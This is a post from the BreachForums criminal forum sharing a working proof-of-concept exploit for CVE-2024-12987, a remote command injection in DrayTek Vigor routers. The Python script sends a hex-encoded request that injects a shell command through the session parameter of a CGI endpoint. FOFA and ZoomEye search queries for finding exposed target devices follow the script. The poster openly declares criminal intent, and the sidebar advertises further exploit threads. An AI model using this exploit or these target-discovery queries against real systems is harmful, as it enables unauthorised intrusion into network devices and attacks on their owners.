JOIN BREACHFORUMS TELEGRAM
CVE-2024-12987: DrayTek Gateways Remote Command Injection
by Aanya - Thursday January 16, 2025 at 12:19 PM
VIP User
VIP
Posts: 101
Threads: 13
Joined: Aug 2024
Reputation: 413
#1
Jan 16, 2025, 12:19 PM (This post was last modified: Jan 16, 2025, 12:27 PM by Aanya.)
Understand this exploit : https://netsecfish.notion.site/Command-I...ffe29ce18f

POC
import socket
import socks


def send_http_request(host_ip, host_port, request):
    socket.socket = socks.socksocket
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(10)
            s.connect((host_ip, host_port))
            request = bytes.fromhex(request.decode())
            s.sendall(request)
            print("HTTP request sent:")
            print(request)

            response = b""
            while True:
                data = s.recv(4096)
                if not data:
                    break
                response += data

            return response.decode('utf-8', errors='replace')
    except Exception as e:
        print("An error occurred:", e)


if __name__ == "__main__":
    host = '<TARGET_IP>'
    port = '<TARGET_PORT>'

    request_apmcfgupload_pwd_binary = b'474554202F6367692D62696E2F6D61696E66756E6374696F6E2E6367692F61706D63666775706C6F61643F73657373696F6E3D7878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787830B42535322463253532246370776420485454502F312E300D0A0D0A'

    response = send_http_request(host, port, request_apmcfgupload_pwd_binary)

    print("HTTP response received:")
    print(response)


FOFA QUERY :
Quote: app="DrayTek-Vigor300B" || app="DrayTek-Vigor2960"
Quote:"excanvas.js" && "lang==\"zh-cn\"" && "detectLang" && server="DWS"
ZOOMEYE QUERY :
Quote: app="DrayTek Vigor 300B broadband router httpd" || app="DrayTek Vigor2960 router httpd"


With Heart @Aanya  :kitten2:
I Love Data
https://i.postimg.cc/vBg3BdY8/Capture.png
I am gonna be  a criminal , Hehehe
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  POC CVE-2025-24071 caca28sapo1 16 1,059 1 hour ago
Last Post: ucy
  Google Dorks for finding SQL injection vulnerabilities and other security issues 1yush 68 3,430 1 hour ago
Last Post: 89UI
  New Zer0 Day Wordpress A3g00n 82 3,765 Yesterday, 01:14 PM
Last Post: wker
  {SECRET} DATABASE OF EXPLOITS lulagain 440 27,770 May 07, 2026, 09:44 PM
Last Post: caribou
  Dokan Pro Unauthenticated SQL Injection POC | CVSS 10 Loki 44 4,092 May 07, 2026, 04:45 PM
Last Post: Insulina

Forum Jump:


 Users browsing this forum: 1 Guest(s)